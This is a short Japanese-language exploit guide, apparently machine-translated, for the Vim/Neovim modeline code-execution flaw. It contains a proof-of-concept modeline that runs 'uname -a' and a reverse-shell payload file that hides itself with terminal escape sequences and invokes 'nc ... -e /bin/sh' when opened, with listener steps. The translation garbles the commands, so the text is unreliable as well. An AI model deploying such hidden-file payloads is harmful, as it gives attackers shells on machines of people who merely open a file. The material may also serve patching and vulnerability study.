影響を受けるバージョン:
Vim < 8.1.1365, Neovim < 0.3.6
前提条件:オープンモードライン
0x01のオープンモードライン
あなたの家であなたの.vimrcファイルに行を追加します。
設定したパターンを
まもなく0x02の
ファイルpoc.txtを作成し、コンテンツ
:!のuname -a || "VI:FEN:FDM = exprの:FDE = assert_fails( "ソース\ \ \%!"):FDL = 0:FDT ="
コマンド$ VIMのpoc.txtを入力します。
システムは、-aのunameます
0x03のリバウンドシェル
次のようにshell.txtの作成、読み込み、
?\ X1Bの[7リットル\ここx1bSNothing \ X1B:サイレント!ワット| コールシステム(\ 'nohupはNC 127.0.0.1 9999 -e / binに/ SH&\')| 再描画!| ファイル| サイレント!#「VIM:設定フェンFDM = exprのFDE = assert_fails(\ 'を設定\\ FDE = X \\ \\ | \\ソース\\ \\ \\%\!')FDL = 0:\ X16 \ X1B [1G \ X16 \ [ここKNothing。 "\ X16 \ X1B [Dの\ nをX1B
二つの端子を開きます。
入力コマンド$ NC -lvvp 9999
別のコマンド$ VIMのshell.txt
成功リバウンドシェル
参考リンク:
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md